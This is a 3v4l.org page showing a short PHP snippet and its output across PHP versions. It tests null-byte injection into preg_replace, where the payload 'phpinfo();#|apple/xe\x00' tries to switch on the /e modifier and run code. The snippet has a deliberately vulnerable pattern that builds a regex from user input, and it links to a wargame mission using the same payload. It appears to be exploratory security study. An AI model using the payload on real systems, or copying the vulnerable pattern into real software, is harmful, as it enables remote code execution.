3v4l.org

run code in 200+ php & hhvm versions
Bugs & Features
<?php //$search = htmlentities($_GET['search']); $search=htmlentities("phpinfo();#|apple/xe\x00"); echo $search; if (strpos($search, 'apple') !== false){ echo preg_replace("/".$search."/", $search." <img src='".$search.".png'>", "apple"); }elseif (strpos($search, 'orange') !== false){ echo preg_replace("/".$search."/", $search." <img src='".$search.".png'>", "orange"); }elseif (strpos($search, 'banana') !== false){ echo preg_replace("/".$search."/", $search." <img src='".$search.".png'>", "banana"); }elseif (strpos($search, 'kiwi') !== false){ echo preg_replace("/".$search."/", $search." <img src='".$search.".png'>", "kiwi"); }else echo "Please search for apple, orange, banana, or kiwi."; #http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-July/007960.html #http://ha.xxor.se/2011/06/null-byte-injection-in-pregreplace.html #http://www.enigmagroup.org/missions/basics/auditing/12/index.php?search=phpinfo();%23|apple/e%00
based on jXIOu
Output for 5.4.7 - 7.2.0
phpinfo();#|apple/xe Warning: preg_replace(): Null byte in regex in /in/qYI8E on line 6
Output for 4.3.0 - 5.0.5, 5.1.1 - 5.4.6
phpinfo();#|apple/xeapple
Output for 5.1.0
Fatal error: fatal flex scanner internal error--end of buffer missed in /in/qYI8E on line 21
Process exited with code 255.